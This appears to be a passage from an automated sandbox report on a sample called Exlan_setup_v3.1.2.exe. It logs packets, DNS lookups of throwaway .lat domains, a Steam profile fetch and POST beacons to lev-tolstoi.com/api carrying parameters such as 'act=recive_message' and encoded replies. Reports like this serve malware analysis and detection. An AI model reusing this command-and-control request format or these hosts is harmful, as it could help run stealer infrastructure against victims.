Dec 31, 2024 08:17:08.214550018 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.214574099 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.214602947 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.214745998 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.214772940 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.223728895 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.223886967 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.223911047 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.223925114 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.223943949 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.223977089 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.228522062 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:09.718208075 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:09.718295097 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:09.718346119 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:09.718544006 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:09.718566895 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:09.722635031 CET	49738	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:09.722666979 CET	443	49738	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:09.722738028 CET	49738	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:09.723010063 CET	49738	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:09.723021984 CET	443	49738	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:10.178666115 CET	443	49738	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:10.178847075 CET	49738	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:10.179996967 CET	49738	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:10.180003881 CET	443	49738	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:10.180202961 CET	443	49738	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:10.181372881 CET	49738	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:10.181404114 CET	49738	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:10.181427002 CET	443	49738	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:10.636105061 CET	443	49738	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:10.636178017 CET	443	49738	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:10.636229038 CET	49738	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:10.638451099 CET	49738	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:10.638463020 CET	443	49738	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:10.638474941 CET	49738	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:10.638478994 CET	443	49738	172.67.157.254	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 08:16:57.264868975 CET	63242	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:16:58.251766920 CET	53	63242	1.1.1.1	192.168.2.4
Dec 31, 2024 08:16:58.294702053 CET	63726	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:16:58.303179026 CET	53	63726	1.1.1.1	192.168.2.4
Dec 31, 2024 08:16:58.332626104 CET	49566	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:16:58.341643095 CET	53	49566	1.1.1.1	192.168.2.4
Dec 31, 2024 08:16:58.344234943 CET	62830	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:16:58.352929115 CET	53	62830	1.1.1.1	192.168.2.4
Dec 31, 2024 08:16:58.354648113 CET	50967	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:16:58.369604111 CET	53	50967	1.1.1.1	192.168.2.4
Dec 31, 2024 08:16:58.403423071 CET	59596	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:16:58.411870003 CET	53	59596	1.1.1.1	192.168.2.4
Dec 31, 2024 08:16:58.415781021 CET	61574	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:16:58.424216032 CET	53	61574	1.1.1.1	192.168.2.4
Dec 31, 2024 08:16:58.425775051 CET	56480	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:16:58.434456110 CET	53	56480	1.1.1.1	192.168.2.4
Dec 31, 2024 08:16:58.451780081 CET	55027	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:16:58.462045908 CET	53	55027	1.1.1.1	192.168.2.4
Dec 31, 2024 08:16:58.511415958 CET	62387	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:16:58.518198013 CET	53	62387	1.1.1.1	192.168.2.4
Dec 31, 2024 08:16:59.827354908 CET	62900	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:16:59.838221073 CET	53	62900	1.1.1.1	192.168.2.4
Dec 31, 2024 08:17:10.639789104 CET	64495	53	192.168.2.4	1.1.1.1
Dec 31, 2024 08:17:10.655636072 CET	53	64495	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 08:16:57.264868975 CET	192.168.2.4	1.1.1.1	0xe572	Standard query (0)	justyffyr.click	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.294702053 CET	192.168.2.4	1.1.1.1	0xbb92	Standard query (0)	wordyfindy.lat	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.332626104 CET	192.168.2.4	1.1.1.1	0x24ca	Standard query (0)	slipperyloo.lat	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.344234943 CET	192.168.2.4	1.1.1.1	0x8d8c	Standard query (0)	manyrestro.lat	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.354648113 CET	192.168.2.4	1.1.1.1	0x56a1	Standard query (0)	shapestickyr.lat	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.403423071 CET	192.168.2.4	1.1.1.1	0xffb9	Standard query (0)	talkynicer.lat	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.415781021 CET	192.168.2.4	1.1.1.1	0xcbcd	Standard query (0)	curverpluch.lat	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.425775051 CET	192.168.2.4	1.1.1.1	0x9119	Standard query (0)	tentabatte.lat	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.451780081 CET	192.168.2.4	1.1.1.1	0x8ca0	Standard query (0)	bashfulacid.lat	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.511415958 CET	192.168.2.4	1.1.1.1	0xebe4	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:59.827354908 CET	192.168.2.4	1.1.1.1	0xb6c5	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:17:10.639789104 CET	192.168.2.4	1.1.1.1	0x8f74	Standard query (0)	cialis26.us	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 08:16:58.251766920 CET	1.1.1.1	192.168.2.4	0xe572	Name error (3)	justyffyr.click	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.303179026 CET	1.1.1.1	192.168.2.4	0xbb92	Name error (3)	wordyfindy.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.341643095 CET	1.1.1.1	192.168.2.4	0x24ca	Name error (3)	slipperyloo.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.352929115 CET	1.1.1.1	192.168.2.4	0x8d8c	Name error (3)	manyrestro.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.369604111 CET	1.1.1.1	192.168.2.4	0x56a1	Name error (3)	shapestickyr.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.411870003 CET	1.1.1.1	192.168.2.4	0xffb9	Name error (3)	talkynicer.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.424216032 CET	1.1.1.1	192.168.2.4	0xcbcd	Name error (3)	curverpluch.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.434456110 CET	1.1.1.1	192.168.2.4	0x9119	Name error (3)	tentabatte.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.462045908 CET	1.1.1.1	192.168.2.4	0x8ca0	Name error (3)	bashfulacid.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:58.518198013 CET	1.1.1.1	192.168.2.4	0xebe4	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:59.838221073 CET	1.1.1.1	192.168.2.4	0xb6c5	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:16:59.838221073 CET	1.1.1.1	192.168.2.4	0xb6c5	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false
Dec 31, 2024 08:17:10.655636072 CET	1.1.1.1	192.168.2.4	0x8f74	Name error (3)	cialis26.us	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

lev-tolstoi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.102.49.254	443	7584	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:16:59 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-31 07:16:59 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 31 Dec 2024 07:16:59 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=0c1558113aeff021c2e328d2; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-31 07:16:59 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-31 07:16:59 UTC	16384	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-31 07:16:59 UTC	3768	IN	Data Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22 Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
2024-12-31 07:16:59 UTC	490	IN	Data Raw: 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74 Data Ascii: r Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	172.67.157.254	443	7584	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:17:00 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2024-12-31 07:17:00 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-31 07:17:00 UTC	1121	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:17:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=26at98stqdr4h64corr5tqh1dd; expires=Sat, 26 Apr 2025 01:03:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rMqyRze5Qb%2FoVvnMFUqCLvK7CQd6pG4WeYorQbx4Fvn%2FCc80NQSyl57MEMjBOMMWHSKdCT4vJk0ptXIVojtUGWXrZzwgUkSeF38T0GeIgui1DTkoKS2fvXGH0DMakfZK6GA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa87cc5482cefa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2012&rtt_var=764&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1424390&cwnd=205&unsent_bytes=0&cid=40a0389e316bef8f&ts=462&x=0"
2024-12-31 07:17:00 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-31 07:17:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	172.67.157.254	443	7584	C:\Users\user\Desktop\Exlan_setup_v3.1.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 07:17:01 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 44 Host: lev-tolstoi.com
2024-12-31 07:17:01 UTC	44	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 6e 39 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=Dvh8ui--n9&j=
2024-12-31 07:17:01 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 07:17:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9ojajq0iep8iijq54tar23i8f4; expires=Sat, 26 Apr 2025 01:03:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DhbaQC%2BsLqTMWzf%2BbTG9cM1%2BrAtNnUe7X%2FO0AMUictOsq8UUYIDPvMtJoZw9DSrKNANdLtb5hBQP1n8QcFo9aAa9%2BXRVkbsBkySUZ8oPWjY5uOAulfjU7wUsfFwtyHuY09I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa87ccb2a694328-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2228&min_rtt=2227&rtt_var=837&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=943&delivery_rate=1306487&cwnd=220&unsent_bytes=0&cid=1d7d9fea02986026&ts=480&x=0"
2024-12-31 07:17:01 UTC	242	IN	Data Raw: 31 63 63 61 0d 0a 64 4a 4c 35 62 55 64 4c 72 70 70 4c 52 78 43 7a 53 69 6d 51 56 2b 31 57 59 73 30 71 30 34 76 74 7a 59 53 42 6f 74 68 61 48 63 73 50 73 49 39 50 66 58 2b 43 75 44 67 69 4d 6f 6b 2b 57 2b 55 79 77 58 51 44 71 51 6a 70 37 59 79 68 39 2b 53 4f 2b 69 78 77 36 55 37 30 6d 41 45 30 4c 6f 4b 34 4c 6a 38 79 69 52 46 53 73 6a 4b 44 64 46 6a 76 54 37 6e 70 6a 4b 48 6d 34 4d 6d 33 4b 6e 47 6f 48 50 36 65 42 53 49 6f 79 76 73 6e 4b 6e 58 57 4c 30 6a 36 4f 59 51 37 43 71 41 49 2f 36 6d 49 74 36 61 37 67 4a 55 2f 61 61 6f 35 38 34 6f 47 5a 54 61 43 34 57 6b 69 66 70 46 77 43 2f 45 79 6a 7a 6f 45 71 55 47 37 34 34 57 70 35 2b 58 49 71 44 4e 37 6f 78 7a 77 6e 51 51 6f 49 64 37 32 4c 53 31 2b 30 43 56 49 73 6e 76 50 Data Ascii: 1ccadJL5bUdLrppLRxCzSimQV+1WYs0q04vtzYSBothaHcsPsI9PfX+CuDgiMok+W+UywXQDqQjp7Yyh9+SO+ixw6U70mAE0LoK4Lj8yiRFSsjKDdFjvT7npjKHm4Mm3KnGoHP6eBSIoyvsnKnXWL0j6OYQ7CqAI/6mIt6a7gJU/aao584oGZTaC4WkifpFwC/EyjzoEqUG744Wp5+XIqDN7oxzwnQQoId72LS1+0CVIsnvP
2024-12-31 07:17:01 UTC	1369	IN	Data Raw: 4d 78 6a 76 45 50 47 36 76 61 7a 33 38 74 57 33 4b 48 6e 70 43 62 36 43 54 79 49 6c 6a 4b 42 70 4c 58 37 66 4c 55 6a 39 4d 6f 34 30 45 71 42 49 73 75 47 48 71 2b 7a 73 7a 37 55 32 64 61 34 65 2b 5a 77 41 49 69 48 4b 39 79 70 6c 50 4a 45 76 55 37 4a 74 7a 78 51 51 72 45 75 6c 35 4a 37 76 2b 61 33 5a 2b 6a 39 7a 36 55 36 77 6e 51 45 6b 4a 4d 7a 71 49 53 35 35 31 44 70 41 2b 7a 69 43 4e 41 32 6c 52 37 4c 70 69 4b 58 73 37 4d 71 2b 4e 58 4b 76 46 76 44 62 51 57 55 75 31 4c 68 78 5a 56 48 55 4f 45 7a 2b 49 38 30 4f 51 4c 41 47 71 4b 6d 49 6f 36 61 37 67 4c 49 39 66 4b 6f 64 2f 35 67 48 4c 6a 76 4d 36 69 38 6f 64 38 4d 75 54 76 77 2f 6a 43 59 4b 6f 55 36 79 34 49 53 6d 34 2b 54 45 2b 6e 59 2f 72 67 36 77 77 30 38 45 4a 4d 66 30 49 7a 4a 79 6b 54 63 46 36 33 57 Data Ascii: MxjvEPG6vaz38tW3KHnpCb6CTyIljKBpLX7fLUj9Mo40EqBIsuGHq+zsz7U2da4e+ZwAIiHK9yplPJEvU7JtzxQQrEul5J7v+a3Z+j9z6U6wnQEkJMzqIS551DpA+ziCNA2lR7LpiKXs7Mq+NXKvFvDbQWUu1LhxZVHUOEz+I80OQLAGqKmIo6a7gLI9fKod/5gHLjvM6i8od8MuTvw/jCYKoU6y4ISm4+TE+nY/rg6ww08EJMf0IzJykTcF63W
2024-12-31 07:17:01 UTC	1369	IN	Data Raw: 55 36 2b 35 49 50 76 71 4b 50 48 6f 6e 67 6e 36 54 7a 7a 6a 77 77 76 61 2f 6e 37 4a 79 74 31 78 32 68 55 76 43 7a 50 4d 77 7a 76 45 50 48 6b 6a 71 66 67 38 63 2b 33 4f 33 47 6e 47 66 57 55 42 79 55 70 77 66 30 74 4c 6e 6e 53 4a 55 2f 67 50 34 38 38 42 61 35 43 75 36 6e 42 37 2b 48 37 67 4f 4a 34 54 72 34 64 73 71 34 4d 4b 79 66 4c 37 6d 6b 36 50 4d 68 6f 54 50 35 31 31 33 51 4e 70 30 32 30 35 6f 36 6c 36 4f 62 4b 74 6a 42 78 71 67 54 2f 6e 77 38 70 49 63 62 31 4a 79 46 36 32 43 4e 41 39 44 57 4f 50 6b 44 68 43 4c 62 78 7a 2f 65 6d 31 38 65 32 4e 58 44 72 49 2f 4f 56 41 53 49 2f 6a 4f 64 6e 50 44 4c 57 4a 41 75 71 64 59 4d 39 41 4b 52 43 74 65 6d 49 6f 75 50 67 78 37 6b 31 65 4b 4d 59 39 35 38 44 4c 43 54 4b 2b 43 34 68 64 38 4d 74 51 76 34 35 7a 33 70 41 Data Ascii: U6+5IPvqKPHongn6Tzzjwwva/n7Jyt1x2hUvCzPMwzvEPHkjqfg8c+3O3GnGfWUByUpwf0tLnnSJU/gP488Ba5Cu6nB7+H7gOJ4Tr4dsq4MKyfL7mk6PMhoTP5113QNp0205o6l6ObKtjBxqgT/nw8pIcb1JyF62CNA9DWOPkDhCLbxz/em18e2NXDrI/OVASI/jOdnPDLWJAuqdYM9AKRCtemIouPgx7k1eKMY958DLCTK+C4hd8MtQv45z3pA
2024-12-31 07:17:01 UTC	1369	IN	Data Raw: 65 57 37 2b 48 76 67 4f 4a 34 64 71 41 45 2f 70 55 47 4b 43 2f 45 2f 79 63 6f 65 64 63 6a 54 50 55 7a 67 6a 77 4e 71 6b 75 77 37 59 57 39 35 65 6a 4b 74 7a 49 2f 35 31 62 33 67 30 39 39 61 65 76 30 41 44 56 70 77 7a 34 4c 37 58 75 57 64 41 65 6a 43 4f 6d 70 6a 4b 44 76 37 4d 69 79 4e 33 43 74 47 50 61 64 41 69 41 6d 78 75 6f 68 4b 33 2f 61 4a 30 44 67 4e 59 49 77 44 4b 74 41 75 75 50 50 34 61 62 6b 32 50 70 67 50 35 77 62 2f 35 73 4d 4d 32 6e 54 74 6a 42 6c 64 64 31 6f 45 37 49 35 67 54 51 50 6f 30 53 36 34 59 36 6a 36 4f 54 46 73 7a 42 33 75 78 66 30 6b 77 34 72 4a 73 33 38 4c 43 42 32 31 69 78 4e 2f 58 58 42 64 41 65 33 43 4f 6d 70 6f 49 6a 54 6f 65 47 41 65 47 44 6e 44 37 43 63 41 32 56 78 6a 50 51 71 4b 58 72 65 4c 6b 4c 2b 50 34 59 2f 44 4b 52 4d 76 Data Ascii: eW7+HvgOJ4dqAE/pUGKC/E/ycoedcjTPUzgjwNqkuw7YW95ejKtzI/51b3g099aev0ADVpwz4L7XuWdAejCOmpjKDv7MiyN3CtGPadAiAmxuohK3/aJ0DgNYIwDKtAuuPP4abk2PpgP5wb/5sMM2nTtjBldd1oE7I5gTQPo0S64Y6j6OTFszB3uxf0kw4rJs38LCB21ixN/XXBdAe3COmpoIjToeGAeGDnD7CcA2VxjPQqKXreLkL+P4Y/DKRMv
